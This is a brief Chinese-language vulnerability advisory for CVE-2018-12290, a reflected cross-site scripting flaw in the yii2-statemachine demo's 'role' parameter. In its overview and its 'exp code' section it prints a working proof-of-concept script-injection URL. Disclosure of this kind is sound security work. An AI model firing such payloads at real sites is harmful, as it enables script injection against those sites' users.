CVE中文申请站

一、漏洞摘要

漏洞名称: yii2-statemachine v2.x.x存在XSS漏洞
上报日期: 2018-06-12
漏洞发现者: longer
产品首页: https://github.com/ptheofan/yii2-statemachine-demo
软件链接: https://github.com/ptheofan/yii2-statemachine-demo
版本: v2.x.x
CVE编号: CVE-2018-12290


二、漏洞概述

由于role参数过滤不严格,导致可以插入js代码造成跨站脚本攻击。如将role参数赋值为“guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>”,并进行get方式提交,可造成跨站脚本攻击。
xss1.png

三、利用代码

exp代码如下:

https://127.0.0.1/?role=guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/40/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12290
exploit-db:发布中

标签: none